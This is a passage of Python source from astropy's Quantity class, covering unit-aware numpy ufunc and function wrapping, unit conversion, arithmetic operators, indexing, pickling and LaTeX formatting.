r'([iI][nN][fF]([iI][nN][iI][tT][yY]){0,1}))'
r'([eE][+-]?\d+)?'
r'[.+-]?')
v = re.match(pattern, value)
unit_string = None
try:
value = float(v.group())
except Exception:
raise TypeError('Cannot parse "{}" as a {}. It does not '
'start with a number.'
.format(value, cls.__name__))
unit_string = v.string[v.end():].strip()
if unit_string:
value_unit = Unit(unit_string)
if unit is None:
unit = value_unit # signal no conversion needed below.
elif (isiterable(value) and len(value) > 0 and
all(isinstance(v, Quantity) for v in value)):
# Convert all quantities to the same unit.
if unit is None:
unit = value[0].unit
value = [q.to_value(unit) for q in value]
value_unit = unit # signal below that conversion has been done
if value_unit is None:
# If the value has a `unit` attribute and if not None
# (for Columns with uninitialized unit), treat it like a quantity.
value_unit = getattr(value, 'unit', None)
if value_unit is None:
# Default to dimensionless for no (initialized) unit attribute.
if unit is None:
unit = cls._default_unit
value_unit = unit # signal below that no conversion is needed
else:
try:
value_unit = Unit(value_unit)
except Exception as exc:
raise TypeError("The unit attribute {!r} of the input could "
"not be parsed as an astropy Unit, raising "
"the following exception:\n{}"
.format(value.unit, exc))
if unit is None:
unit = value_unit
elif unit is not value_unit:
copy = False # copy will be made in conversion at end
value = np.array(value, dtype=dtype, copy=copy, order=order,
subok=False, ndmin=ndmin)
# check that array contains numbers or long int objects
if (value.dtype.kind in 'OSU' and
not (value.dtype.kind == 'O' and
isinstance(value.item(() if value.ndim == 0 else 0),
numbers.Number))):
raise TypeError("The value must be a valid Python or "
"Numpy numeric type.")
# by default, cast any integer, boolean, etc., to float
if dtype is None and value.dtype.kind in 'iuO':
value = value.astype(float)
value = value.view(cls)
value._set_unit(value_unit)
if unit is value_unit:
return value
else:
# here we had non-Quantity input that had a "unit" attribute
# with a unit different from the desired one. So, convert.
return value.to(unit)
def __array_finalize__(self, obj):
# If we're a new object or viewing an ndarray, nothing has to be done.
if obj is None or obj.__class__ is np.ndarray:
return
# If our unit is not set and obj has a valid one, use it.
if self._unit is None:
unit = getattr(obj, '_unit', None)
if unit is not None:
self._set_unit(unit)
# Copy info if the original had `info` defined. Because of the way the
# DataInfo works, `'info' in obj.__dict__` is False until the
# `info` attribute is accessed or set.
if 'info' in obj.__dict__:
self.info = obj.info
def __array_wrap__(self, obj, context=None):
if context is None:
# Methods like .squeeze() created a new `ndarray` and then call
# __array_wrap__ to turn the array into self's subclass.
return self._new_view(obj)
raise NotImplementedError('__array_wrap__ should not be used '
'with a context any more, since we require '
'numpy >=1.13. Please raise an issue on '
'https://github.com/astropy/astropy')
def __array_ufunc__(self, function, method, *inputs, **kwargs):
"""Wrap numpy ufuncs, taking care of units.
Parameters
----------
function : callable
ufunc to wrap.
method : str
Ufunc method: ``__call__``, ``at``, ``reduce``, etc.
inputs : tuple
Input arrays.
kwargs : keyword arguments
As passed on, with ``out`` containing possible quantity output.
Returns
-------
result : `~astropy.units.Quantity`
Results of the ufunc, with the unit set properly.
"""
# Determine required conversion functions -- to bring the unit of the
# input to that expected (e.g., radian for np.sin), or to get
# consistent units between two inputs (e.g., in np.add) --
# and the unit of the result (or tuple of units for nout > 1).
converters, unit = converters_and_unit(function, method, *inputs)
out = kwargs.get('out', None)
# Avoid loop back by turning any Quantity output into array views.
if out is not None:
# If pre-allocated output is used, check it is suitable.
# This also returns array view, to ensure we don't loop back.
if function.nout == 1:
out = out[0]
out_array = check_output(out, unit, inputs, function=function)
# Ensure output argument remains a tuple.
kwargs['out'] = (out_array,) if function.nout == 1 else out_array
# Same for inputs, but here also convert if necessary.
arrays = []
for input_, converter in zip(inputs, converters):
input_ = getattr(input_, 'value', input_)
arrays.append(converter(input_) if converter else input_)
# Call our superclass's __array_ufunc__
result = super().__array_ufunc__(function, method, *arrays, **kwargs)
# If unit is None, a plain array is expected (e.g., comparisons), which
# means we're done.
# We're also done if the result was None (for method 'at') or
# NotImplemented, which can happen if other inputs/outputs override
# __array_ufunc__; hopefully, they can then deal with us.
if unit is None or result is None or result is NotImplemented:
return result
return self._result_as_quantity(result, unit, out)
def _result_as_quantity(self, result, unit, out):
"""Turn result into a quantity with the given unit.
If no output is given, it will take a view of the array as a quantity,
and set the unit. If output is given, those should be quantity views
of the result arrays, and the function will just set the unit.
Parameters
----------
result : `~numpy.ndarray` or tuple of `~numpy.ndarray`
Array(s) which need to be turned into quantity.
unit : `~astropy.units.Unit`
Unit for the quantities to be returned (or `None` if the result
should not be a quantity). Should be tuple if result is a tuple.
out : `~astropy.units.Quantity` or None
Possible output quantity. Should be `None` or a tuple if result
is a tuple.
Returns
-------
out : `~astropy.units.Quantity`
With units set.
"""
if isinstance(result, (tuple, list)):
if out is None:
out = (None,) * len(result)
return result.__class__(
self._result_as_quantity(result_, unit_, out_)
for (result_, unit_, out_) in
zip(result, unit, out))
if out is None:
# View the result array as a Quantity with the proper unit.
return result if unit is None else self._new_view(result, unit)
# For given output, just set the unit. We know the unit is not None and
# the output is of the correct Quantity subclass, as it was passed
# through check_output.
out._set_unit(unit)
return out
def __quantity_subclass__(self, unit):
"""
Overridden by subclasses to change what kind of view is
created based on the output unit of an operation.
Parameters
----------
unit : UnitBase
The unit for which the appropriate class should be returned
Returns
-------
tuple :
- `Quantity` subclass
- bool: True if subclasses of the given class are ok
"""
return Quantity, True
def _new_view(self, obj=None, unit=None):
"""
Create a Quantity view of some array-like input, and set the unit
By default, return a view of ``obj`` of the same class as ``self`` and
with the same unit. Subclasses can override the type of class for a
given unit using ``__quantity_subclass__``, and can ensure properties
other than the unit are copied using ``__array_finalize__``.
If the given unit defines a ``_quantity_class`` of which ``self``
is not an instance, a view using this class is taken.
Parameters
----------
obj : ndarray or scalar, optional
The array to create a view of. If obj is a numpy or python scalar,
it will be converted to an array scalar. By default, ``self``
is converted.
unit : `UnitBase`, or anything convertible to a :class:`~astropy.units.Unit`, optional
The unit of the resulting object. It is used to select a
subclass, and explicitly assigned to the view if given.
If not given, the subclass and unit will be that of ``self``.
Returns
-------
view : Quantity subclass
"""
# Determine the unit and quantity subclass that we need for the view.
if unit is None:
unit = self.unit
quantity_subclass = self.__class__
elif unit is self.unit and self.__class__ is Quantity:
# The second part is because we should not presume what other
# classes want to do for the same unit. E.g., Constant will
# always want to fall back to Quantity, and relies on going
# through `__quantity_subclass__`.
quantity_subclass = Quantity
else:
unit = Unit(unit)
quantity_subclass = getattr(unit, '_quantity_class', Quantity)
if isinstance(self, quantity_subclass):
quantity_subclass, subok = self.__quantity_subclass__(unit)
if subok:
quantity_subclass = self.__class__
# We only want to propagate information from ``self`` to our new view,
# so obj should be a regular array. By using ``np.array``, we also
# convert python and numpy scalars, which cannot be viewed as arrays
# and thus not as Quantity either, to zero-dimensional arrays.
# (These are turned back into scalar in `.value`)
# Note that for an ndarray input, the np.array call takes only double
# ``obj.__class is np.ndarray``. So, not worth special-casing.
if obj is None:
obj = self.view(np.ndarray)
else:
obj = np.array(obj, copy=False)
# Take the view, set the unit, and update possible other properties
# such as ``info``, ``wrap_angle`` in `Longitude`, etc.
view = obj.view(quantity_subclass)
view._set_unit(unit)
view.__array_finalize__(self)
return view
def _set_unit(self, unit):
"""Set the unit.
This is used anywhere the unit is set or modified, i.e., in the
initilizer, in ``__imul__`` and ``__itruediv__`` for in-place
multiplication and division by another unit, as well as in
``__array_finalize__`` for wrapping up views. For Quantity, it just
sets the unit, but subclasses can override it to check that, e.g.,
a unit is consistent.
"""
if not isinstance(unit, UnitBase):
# Trying to go through a string ensures that, e.g., Magnitudes with
# dimensionless physical unit become Quantity with units of mag.
unit = Unit(str(unit), parse_strict='silent')
if not isinstance(unit, UnitBase):
raise UnitTypeError(
"{} instances require {} units, not {} instances."
.format(type(self).__name__, UnitBase, type(unit)))
self._unit = unit
def __deepcopy__(self, memo):
# If we don't define this, ``copy.deepcopy(quantity)`` will
# return a bare Numpy array.
return self.copy()
def __reduce__(self):
# patch to pickle Quantity objects (ndarray subclasses), see
# http://www.mail-archive.com/numpy-discussion@scipy.org/msg02446.html
object_state = list(super().__reduce__())
object_state[2] = (object_state[2], self.__dict__)
return tuple(object_state)
def __setstate__(self, state):
# patch to unpickle Quantity objects (ndarray subclasses), see
# http://www.mail-archive.com/numpy-discussion@scipy.org/msg02446.html
nd_state, own_state = state
super().__setstate__(nd_state)
self.__dict__.update(own_state)
info = QuantityInfo()
def _to_value(self, unit, equivalencies=[]):
"""Helper method for to and to_value."""
if equivalencies == []:
equivalencies = self._equivalencies
return self.unit.to(unit, self.view(np.ndarray),
equivalencies=equivalencies)
def to(self, unit, equivalencies=[]):
"""
Return a new `~astropy.units.Quantity` object with the specified unit.
Parameters
----------
unit : `~astropy.units.UnitBase` instance, str
An object that represents the unit to convert to. Must be
an `~astropy.units.UnitBase` object or a string parseable
by the `~astropy.units` package.
equivalencies : list of equivalence pairs, optional
A list of equivalence pairs to try if the units are not
directly convertible. See :ref:`unit_equivalencies`.
If not provided or ``[]``, class default equivalencies will be used
(none for `~astropy.units.Quantity`, but may be set for subclasses)
If `None`, no equivalencies will be applied at all, not even any
set globally or within a context.
See also
--------
to_value : get the numerical value in a given unit.
"""
# We don't use `to_value` below since we always want to make a copy
# and don't want to slow down this method (esp. the scalar case).
unit = Unit(unit)
return self._new_view(self._to_value(unit, equivalencies), unit)
def to_value(self, unit=None, equivalencies=[]):
"""
The numerical value, possibly in a different unit.
Parameters
----------
unit : `~astropy.units.UnitBase` instance or str, optional
The unit in which the value should be given. If not given or `None`,
use the current unit.
equivalencies : list of equivalence pairs, optional
A list of equivalence pairs to try if the units are not directly
convertible (see :ref:`unit_equivalencies`). If not provided or
``[]``, class default equivalencies will be used (none for
`~astropy.units.Quantity`, but may be set for subclasses).
If `None`, no equivalencies will be applied at all, not even any
set globally or within a context.
Returns
-------
value : `~numpy.ndarray` or scalar
The value in the units specified. For arrays, this will be a view
of the data if no unit conversion was necessary.
See also
--------
to : Get a new instance in a different unit.
"""
if unit is None or unit is self.unit:
value = self.view(np.ndarray)
else:
unit = Unit(unit)
# We want a view if the unit does not change. One could check
# with "==", but that calculates the scale that we need anyway.
# TODO: would be better for `unit.to` to have an in-place flag.
try:
scale = self.unit._to(unit)
except Exception:
# Short-cut failed; try default (maybe equivalencies help).
value = self._to_value(unit, equivalencies)
else:
value = self.view(np.ndarray)
if not is_effectively_unity(scale):
# not in-place!
value = value * scale
# Index with empty tuple to decay array scalars in to numpy scalars.
return value[()]
value = property(to_value,
doc="""The numerical value of this instance.
See also
--------
to_value : Get the numerical value in a given unit.
""")
@property
def unit(self):
"""
A `~astropy.units.UnitBase` object representing the unit of this
quantity.
"""
return self._unit
@property
def equivalencies(self):
"""
A list of equivalencies that will be applied by default during
unit conversions.
"""
return self._equivalencies
@property
def si(self):
"""
Returns a copy of the current `Quantity` instance with SI units. The
value of the resulting object will be scaled.
"""
si_unit = self.unit.si
return self._new_view(self.value * si_unit.scale,
si_unit / si_unit.scale)
@property
def cgs(self):
"""
Returns a copy of the current `Quantity` instance with CGS units. The
value of the resulting object will be scaled.
"""
cgs_unit = self.unit.cgs
return self._new_view(self.value * cgs_unit.scale,
cgs_unit / cgs_unit.scale)
@property
def isscalar(self):
"""
True if the `value` of this quantity is a scalar, or False if it
is an array-like object.
.. note::
This is subtly different from `numpy.isscalar` in that
`numpy.isscalar` returns False for a zero-dimensional array
(e.g. ``np.array(1)``), while this is True for quantities,
since quantities cannot represent true numpy scalars.
"""
return not self.shape
# This flag controls whether convenience conversion members, such
# as `q.m` equivalent to `q.to_value(u.m)` are available. This is
# not turned on on Quantity itself, but is on some subclasses of
# Quantity, such as `astropy.coordinates.Angle`.
_include_easy_conversion_members = False
@override__dir__
def __dir__(self):
"""
Quantities are able to directly convert to other units that
have the same physical type. This function is implemented in
order to make autocompletion still work correctly in IPython.
"""
if not self._include_easy_conversion_members:
return []
extra_members = set()
equivalencies = Unit._normalize_equivalencies(self.equivalencies)
for equivalent in self.unit._get_units_with_same_physical_type(
equivalencies):
extra_members.update(equivalent.names)
return extra_members
def __getattr__(self, attr):
"""
Quantities are able to directly convert to other units that
have the same physical type.
"""
if not self._include_easy_conversion_members:
raise AttributeError(
"'{}' object has no '{}' member".format(
self.__class__.__name__,
attr))
def get_virtual_unit_attribute():
registry = get_current_unit_registry().registry
to_unit = registry.get(attr, None)
if to_unit is None:
return None
try:
return self.unit.to(
to_unit, self.value, equivalencies=self.equivalencies)
except UnitsError:
return None
value = get_virtual_unit_attribute()
if value is None:
raise AttributeError(
"{} instance has no attribute '{}'".format(
self.__class__.__name__, attr))
else:
return value
# Equality needs to be handled explicitly as ndarray.__eq__ gives
# DeprecationWarnings on any error, which is distracting. On the other
# hand, for structured arrays, the ufunc does not work, so we do use
# __eq__ and live with the warnings.
def __eq__(self, other):
try:
if self.dtype.kind == 'V':
return super().__eq__(other)
else:
return np.equal(self, other)
except UnitsError:
return False
except TypeError:
return NotImplemented
def __ne__(self, other):
try:
if self.dtype.kind == 'V':
return super().__ne__(other)
else:
return np.not_equal(self, other)
except UnitsError:
return True
except TypeError:
return NotImplemented
# Unit conversion operator (<<).
def __lshift__(self, other):
try:
other = Unit(other, parse_strict='silent')
except UnitTypeError:
return NotImplemented
return self.__class__(self, other, copy=False, subok=True)
def __ilshift__(self, other):
try:
other = Unit(other, parse_strict='silent')
except UnitTypeError:
return NotImplemented
try:
factor = self.unit._to(other)
except UnitConversionError:
# Maybe via equivalencies? Now we do make a temporary copy.
try:
value = self._to_value(other)
except UnitConversionError:
return NotImplemented
self.view(np.ndarray)[...] = value
else:
self.view(np.ndarray)[...] *= factor
self._set_unit(other)
return self
def __rlshift__(self, other):
if not self.isscalar:
return NotImplemented
return Unit(self).__rlshift__(other)
# Give warning for other >> self, since probably other << self was meant.
def __rrshift__(self, other):
warnings.warn(">> is not implemented. Did you mean to convert "
"something to this quantity as a unit using '<<'?",
AstropyWarning)
return NotImplemented
# Also define __rshift__ and __irshift__ so we override default ndarray
# behaviour, but instead of emitting a warning here, let it be done by
# other (which likely is a unit if this was a mistake).
def __rshift__(self, other):
return NotImplemented
def __irshift__(self, other):
return NotImplemented
# Arithmetic operations
def __mul__(self, other):
""" Multiplication between `Quantity` objects and other objects."""
if isinstance(other, (UnitBase, str)):
try:
return self._new_view(self.copy(), other * self.unit)
except UnitsError: # let other try to deal with it
return NotImplemented
return super().__mul__(other)
def __imul__(self, other):
"""In-place multiplication between `Quantity` objects and others."""
if isinstance(other, (UnitBase, str)):
self._set_unit(other * self.unit)
return self
return super().__imul__(other)
def __rmul__(self, other):
""" Right Multiplication between `Quantity` objects and other
objects.
"""
return self.__mul__(other)
def __truediv__(self, other):
""" Division between `Quantity` objects and other objects."""
if isinstance(other, (UnitBase, str)):
try:
return self._new_view(self.copy(), self.unit / other)
except UnitsError: # let other try to deal with it
return NotImplemented
return super().__truediv__(other)
def __itruediv__(self, other):
"""Inplace division between `Quantity` objects and other objects."""
if isinstance(other, (UnitBase, str)):
self._set_unit(self.unit / other)
return self
return super().__itruediv__(other)
def __rtruediv__(self, other):
""" Right Division between `Quantity` objects and other objects."""
if isinstance(other, (UnitBase, str)):
return self._new_view(1. / self.value, other / self.unit)
return super().__rtruediv__(other)
def __div__(self, other):
""" Division between `Quantity` objects. """
return self.__truediv__(other)
def __idiv__(self, other):
""" Division between `Quantity` objects. """
return self.__itruediv__(other)
def __rdiv__(self, other):
""" Division between `Quantity` objects. """
return self.__rtruediv__(other)
def __pow__(self, other):
if isinstance(other, Fraction):
# Avoid getting object arrays by raising the value to a Fraction.
return self._new_view(self.value ** float(other),
self.unit ** other)
return super().__pow__(other)
# For Py>=3.5
if NUMPY_LT_1_16:
def __matmul__(self, other):
result_unit = self.unit * getattr(other, 'unit',
dimensionless_unscaled)
result_array = np.matmul(self.value,
getattr(other, 'value', other))
return self._new_view(result_array, result_unit)
def __rmatmul__(self, other):
result_unit = self.unit * getattr(other, 'unit',
dimensionless_unscaled)
result_array = np.matmul(getattr(other, 'value', other),
self.value)
return self._new_view(result_array, result_unit)
# In numpy 1.13, 1.14, a np.positive ufunc exists, but ndarray.__pos__
# does not go through it, so we define it, to allow subclasses to override
# it inside __array_ufunc__. This can be removed if a solution to
# https://github.com/numpy/numpy/issues/9081 is merged.
def __pos__(self):
"""Plus the quantity."""
return np.positive(self)
# other overrides of special functions
def __hash__(self):
return hash(self.value) ^ hash(self.unit)
def __iter__(self):
if self.isscalar:
raise TypeError(
"'{cls}' object with a scalar value is not iterable"
.format(cls=self.__class__.__name__))
# Otherwise return a generator
def quantity_iter():
for val in self.value:
yield self._new_view(val)
return quantity_iter()
def __getitem__(self, key):
try:
out = super().__getitem__(key)
except IndexError:
# We want zero-dimensional Quantity objects to behave like scalars,
# so they should raise a TypeError rather than an IndexError.
if self.isscalar:
raise TypeError(
"'{cls}' object with a scalar value does not support "
"indexing".format(cls=self.__class__.__name__))
else:
raise
# For single elements, ndarray.__getitem__ returns scalars; these
# need a new view as a Quantity.
if type(out) is not type(self):
out = self._new_view(out)
return out
def __setitem__(self, i, value):
# update indices in info if the info property has been accessed
# (in which case 'info' in self.__dict__ is True; this is guaranteed
# to be the case if we're part of a table).
if not self.isscalar and 'info' in self.__dict__:
self.info.adjust_indices(i, value, len(self))
self.view(np.ndarray).__setitem__(i, self._to_own_unit(value))
# __contains__ is OK
def __bool__(self):
"""Quantities should always be treated as non-False; there is too much
potential for ambiguity otherwise.
"""
warnings.warn('The truth value of a Quantity is ambiguous. '
'In the future this will raise a ValueError.',
AstropyDeprecationWarning)
return True
def __len__(self):
if self.isscalar:
raise TypeError("'{cls}' object with a scalar value has no "
"len()".format(cls=self.__class__.__name__))
else:
return len(self.value)
# Numerical types
def __float__(self):
try:
return float(self.to_value(dimensionless_unscaled))
except (UnitsError, TypeError):
raise TypeError('only dimensionless scalar quantities can be '
'converted to Python scalars')
def __int__(self):
try:
return int(self.to_value(dimensionless_unscaled))
except (UnitsError, TypeError):
raise TypeError('only dimensionless scalar quantities can be '
'converted to Python scalars')
def __index__(self):
# for indices, we do not want to mess around with scaling at all,
# so unlike for float, int, we insist here on unscaled dimensionless
try:
assert self.unit.is_unity()
return self.value.__index__()
except Exception:
raise TypeError('only integer dimensionless scalar quantities '
'can be converted to a Python index')
# TODO: we may want to add a hook for dimensionless quantities?
@property
def _unitstr(self):
if self.unit is None:
unitstr = _UNIT_NOT_INITIALISED
else:
unitstr = str(self.unit)
if unitstr:
unitstr = ' ' + unitstr
return unitstr
def to_string(self, unit=None, precision=None, format=None, subfmt=None):
"""
Generate a string representation of the quantity and its unit.
The behavior of this function can be altered via the
`numpy.set_printoptions` function and its various keywords. The
exception to this is the ``threshold`` keyword, which is controlled via
the ``[units.quantity]`` configuration item ``latex_array_threshold``.
This is treated separately because the numpy default of 1000 is too big
for most browsers to handle.
Parameters
----------
unit : `~astropy.units.UnitBase`, optional
Specifies the unit. If not provided,
the unit used to initialize the quantity will be used.
precision : numeric, optional
The level of decimal precision. If `None`, or not provided,
it will be determined from NumPy print options.
format : str, optional
The format of the result. If not provided, an unadorned
string is returned. Supported values are:
- 'latex': Return a LaTeX-formatted string
subfmt : str, optional
Subformat of the result. For the moment,
only used for format="latex". Supported values are:
- 'inline': Use ``$ ... $`` as delimiters.
- 'display': Use ``$\\displaystyle ... $`` as delimiters.
Returns
-------
lstr
A string with the contents of this Quantity
"""
if unit is not None and unit != self.unit:
return self.to(unit).to_string(
unit=None, precision=precision, format=format, subfmt=subfmt)
formats = {
None: None,
"latex": {
None: ("$", "$"),
"inline": ("$", "$"),
"display": (r"$\displaystyle ", r"$"),
},
}
if format not in formats:
raise ValueError(f"Unknown format '{format}'")
elif format is None:
return f'{self.value}{self._unitstr:s}'
# else, for the moment we assume format="latex"
# need to do try/finally because "threshold" cannot be overridden
# with array2string
pops = np.get_printoptions()
format_spec = '.{}g'.format(
precision if precision is not None else pops['precision'])
def float_formatter(value):
return Latex.format_exponential_notation(value,
format_spec=format_spec)
def complex_formatter(value):
return '({}{}i)'.format(
Latex.format_exponential_notation(value.real,
format_spec=format_spec),
Latex.format_exponential_notation(value.imag,
format_spec='+' + format_spec))
try:
formatter = {'float_kind': float_formatter,
'complex_kind': complex_formatter}
if conf.latex_array_threshold > -1:
np.set_printoptions(threshold=conf.latex_array_threshold,
formatter=formatter)
# the view is needed for the scalar case - value might be float
if NUMPY_LT_1_14: # style deprecated in 1.14
latex_value = np.array2string(
self.view(np.ndarray),
style=(float_formatter if self.dtype.kind == 'f'
else complex_formatter if self.dtype.kind == 'c'
else repr),
max_line_width=np.inf, separator=',~')
else:
latex_value = np.array2string(
self.view(np.ndarray),
max_line_width=np.inf, separator=',~')
latex_value = latex_value.replace('...', r'\dots')
finally:
np.set_printoptions(**pops)
# Format unit
# [1:-1] strips the '$' on either side needed for math mode
latex_unit = (self.unit._repr_latex_()[1:-1] # note this is unicode
if self.unit is not None
else _UNIT_NOT_INITIALISED)
delimiter_left, delimiter_right = formats[format][subfmt]
return r'{left}{0} \; {1}{right}'.format(latex_value, latex_unit,
left=delimiter_left,
right=delimiter_right)
def __str__(self):
return self.to_string()
def __repr__(self):
prefixstr = '<' + self.__class__.__name__ + ' '
sep = ',' if NUMPY_LT_1_14 else ', '
arrstr = np.array2string(self.view(np.ndarray), separator=sep,
prefix=prefixstr)
return f'{prefixstr}{arrstr}{self._unitstr:s}>'
def _repr_latex_(self):
"""
Generate a latex representation of the quantity and its unit.
Returns
-------
lstr
A LaTeX string with the contents of this Quantity
"""
# NOTE: This should change to display format in a future release
return self.to_string(format='latex', subfmt='inline')
def __format__(self, format_spec):
"""
Format quantities using the new-style python formatting codes
as specifiers for the number.
If the format specifier correctly applies itself to the value,
then it is used to format only the value. If it cannot be
applied to the value, then it is applied to the whole string.
"""
try:
value = format(self.value, format_spec)
full_format_spec = "s"
except ValueError:
value = self.value
full_format_spec = format_spec
return format(f"{value}{self._unitstr:s}",
full_format_spec)
def decompose(self, bases=[]):
"""
Generates a new `Quantity` with the units
decomposed. Decomposed units have only irreducible units in
them (see `astropy.units.UnitBase.decompose`).
Parameters
----------
bases : sequence of UnitBase, optional
The bases to decompose into. When not provided,
decomposes down to any irreducible units. When provided,
the decomposed result will only contain the given units.
This will raises a `~astropy.units.UnitsError` if it's not possible
to do so.
Returns
-------
newq : `~astropy.units.Quantity`
A new object equal to this quantity with units decomposed.
"""
return self._decompose(False, bases=bases)
def _decompose(self, allowscaledunits=False, bases=[]):
"""
Generates a new `Quantity` with the units decomposed. Decomposed
units have only irreducible units in them (see
`astropy.units.UnitBase.decompose`).
Parameters
----------
allowscaledunits : bool
If True, the resulting `Quantity` may have a scale factor
associated with it. If False, any scaling in the unit will
be subsumed into the value of the resulting `Quantity`
bases : sequence of UnitBase, optional
The bases to decompose into. When not provided,
decomposes down to any irreducible units. When provided,
the decomposed result will only contain the given units.
This will raises a `~astropy.units.UnitsError` if it's not possible
to do so.
Returns
-------
newq : `~astropy.units.Quantity`
A new object equal to this quantity with units decomposed.
"""
new_unit = self.unit.decompose(bases=bases)
# Be careful here because self.value usually is a view of self;
# be sure that the original value is not being modified.
if not allowscaledunits and hasattr(new_unit, 'scale'):
new_value = self.value * new_unit.scale
new_unit = new_unit / new_unit.scale
return self._new_view(new_value, new_unit)
else:
return self._new_view(self.copy(), new_unit)
# These functions need to be overridden to take into account the units
# Array conversion
# http://docs.scipy.org/doc/numpy/reference/arrays.ndarray.html#array-conversion
def item(self, *args):
return self._new_view(super().item(*args))
def tolist(self):
raise NotImplementedError("cannot make a list of Quantities. Get "
"list of values with q.value.list()")
def _to_own_unit(self, value, check_precision=True):
try:
_value = value.to_value(self.unit)
except AttributeError:
# We're not a Quantity, so let's try a more general conversion.
# Plain arrays will be converted to dimensionless in the process,
# but anything with a unit attribute will use that.
as_quantity = Quantity(value)
try:
_value = as_quantity.to_value(self.unit)
except UnitsError:
# last chance: if this was not something with a unit
# and is all 0, inf, or nan, we treat it as arbitrary unit.
if (not hasattr(value, 'unit') and
can_have_arbitrary_unit(as_quantity.value)):
_value = as_quantity.value
else:
raise
if check_precision:
# If, e.g., we are casting double to float, we want to fail if
# precision is lost, but let things pass if it works.
_value = np.array(_value, copy=False)
if not np.can_cast(_value.dtype, self.dtype):
self_dtype_array = np.array(_value, self.dtype)
if not np.all(np.logical_or(self_dtype_array == _value,
np.isnan(_value))):
raise TypeError("cannot convert value type to array type "
"without precision loss")
return _value
def itemset(self, *args):
if len(args) == 0:
raise ValueError("itemset must have at least one argument")
self.view(np.ndarray).itemset(*(args[:-1] +
(self._to_own_unit(args[-1]),)))
def tostring(self, order='C'):
raise NotImplementedError("cannot write Quantities to string. Write "
"array with q.value.tostring(...).")
def tofile(self, fid, sep="", format="%s"):
raise NotImplementedError("cannot write Quantities to file. Write "
"array with q.value.tofile(...)")
def dump(self, file):
raise NotImplementedError("cannot dump Quantities to file. Write "
"array with q.value.dump()")
def dumps(self):
raise NotImplementedError("cannot dump Quantities to string. Write "
"array with q.value.dumps()")
# astype, byteswap, copy, view, getfield, setflags OK as is
def fill(self, value):
self.view(np.ndarray).fill(self._to_own_unit(value))
# Shape manipulation: resize cannot be done (does not own data), but
# shape, transpose, swapaxes, flatten, ravel, squeeze all OK. Only
# the flat iterator needs to be overwritten, otherwise single items are
# returned as numbers.
@property
def flat(self):
"""A 1-D iterator over the Quantity array.
This returns a ``QuantityIterator`` instance, which behaves the same
as the `~numpy.flatiter` instance returned by `~numpy.ndarray.flat`,
and is similar to, but not a subclass of, Python's built-in iterator
object.
"""
return QuantityIterator(self)
@flat.setter
def flat(self, value):
y = self.ravel()
y[:] = value
# Item selection and manipulation
# repeat, sort, compress, diagonal OK
def take(self, indices, axis=None, out=None, mode='raise'):
out = super().take(indices, axis=axis, out=out, mode=mode)
# For single elements, ndarray.take returns scalars; these
# need a new view as a Quantity.
if type(out) is not type(self):
out = self._new_view(out)
return out
def put(self, indices, values, mode='raise'):
self.view(np.ndarray).put(indices, self._to_own_unit(values), mode)
def choose(self, choices, out=None, mode='raise'):
raise NotImplementedError("cannot choose based on quantity. Choose "
"using array with q.value.choose(...)")
# ensure we do not return indices as quantities
def argsort(self, axis=-1, kind='quicksort', order=None):
return self.view(np.ndarray).argsort(axis=axis, kind=kind, order=order)
def searchsorted(self, v, *args, **kwargs):
return np.searchsorted(np.array(self),
self._to_own_unit(v, check_precision=False),
*args, **kwargs) # avoid numpy 1.6 problem
def argmax(self, axis=None, out=None):
return self.view(np.ndarray).argmax(axis, out=out)
def argmin(self, axis=None, out=None):
return self.view(np.ndarray).argmin(axis, out=out)
def __array_function__(self, function, types, args, kwargs):
"""Wrap numpy functions, taking care of units.
Parameters
----------
function : callable
Numpy function to wrap
types : iterable of classes
Classes that provide an ``__array_function__`` override. Can
in principle be used to interact with other classes. Below,
mostly passed on to `~numpy.ndarray`, which can only interact
with subclasses.
args : tuple
Positional arguments provided in the function call.
kwargs : dict
Keyword arguments provided in the function call.
Returns
-------
result: `~astropy.units.Quantity`, `~numpy.ndarray`
As appropriate for the function. If the function is not
supported, `NotImplemented` is returned, which will lead to
a `TypeError` unless another argument overrode the function.
Raises
------
~astropy.units.UnitsError
If operands have incompatible units.
"""
# A function should be in one of the following sets of dicts:
# 1. SUBCLASS_SAFE_FUNCTIONS (set), if the numpy implementation
# supports Quantity; we pass on to ndarray.__array_function__.
# 2. FUNCTION_HELPERS (dict), if the numpy implementation is usable
# after converting quantities to arrays with suitable units,
# and possibly setting units on the result.
# 3. DISPATCHED_FUNCTIONS (dict), if the function makes sense but
# requires a Quantity-specific implementation.
# 4. UNSUPPORTED_FUNCTIONS (set), if the function does not make sense.
# For now, since we may not yet have complete coverage, if a
# function is in none of the above, we simply call the numpy
# implementation.
if function in SUBCLASS_SAFE_FUNCTIONS:
return super().__array_function__(function, types, args, kwargs)
elif function in FUNCTION_HELPERS:
function_helper = FUNCTION_HELPERS[function]
try:
args, kwargs, unit, out = function_helper(*args, **kwargs)
except NotImplementedError:
return self._not_implemented_or_raise(function, types)
result = super().__array_function__(function, types, args, kwargs)
# Fall through to return section
elif function in DISPATCHED_FUNCTIONS:
dispatched_function = DISPATCHED_FUNCTIONS[function]
try:
result, unit, out = dispatched_function(*args, **kwargs)
except NotImplementedError:
return self._not_implemented_or_raise(function, types)
# Fall through to return section
elif function in UNSUPPORTED_FUNCTIONS:
return NotImplemented
else:
warnings.warn("function '{}' is not known to astropy's Quantity. "
"Will run it anyway, hoping it will treat ndarray "
"subclasses correctly. Please raise an issue at "
"https://github.com/astropy/astropy/issues. "
.format(function.__name__), AstropyWarning)
return super().__array_function__(function, types, args, kwargs)
# If unit is None, a plain array is expected (e.g., boolean), which
# means we're done.
# We're also done if the result was NotImplemented, which can happen
# if other inputs/outputs override __array_function__;
# hopefully, they can then deal with us.
if unit is None or result is NotImplemented:
return result
return self._result_as_quantity(result, unit, out=out)
def _not_implemented_or_raise(self, function, types):
# Our function helper or dispatcher found that the function does not
# work with Quantity. In principle, there may be another class that
# knows what to do with us, for which we should return NotImplemented.
# But if there is ndarray (or a non-Quantity subclass of it) around,
# it quite likely coerces, so we should just break.
if any(issubclass(t, np.ndarray) and not issubclass(t, Quantity)
for t in types):
raise TypeError("the Quantity implementation cannot handle {} "
"with the given arguments."
.format(function)) from None
else:
return NotImplemented
# Calculation -- override ndarray methods to take into account units.
# We use the corresponding numpy functions to evaluate the results, since
# the methods do not always allow calling with keyword arguments.
# For instance, np.array([0.,2.]).clip(a_min=0., a_max=1.) gives
# TypeError: 'a_max' is an invalid keyword argument for this function.
def _wrap_function(self, function, *args, unit=None, out=None, **kwargs):
"""Wrap a numpy function that processes self, returning a Quantity.
Parameters
----------
function : callable
Numpy function to wrap.
args : positional arguments
Any positional arguments to the function beyond the first argument
(which will be set to ``self``).
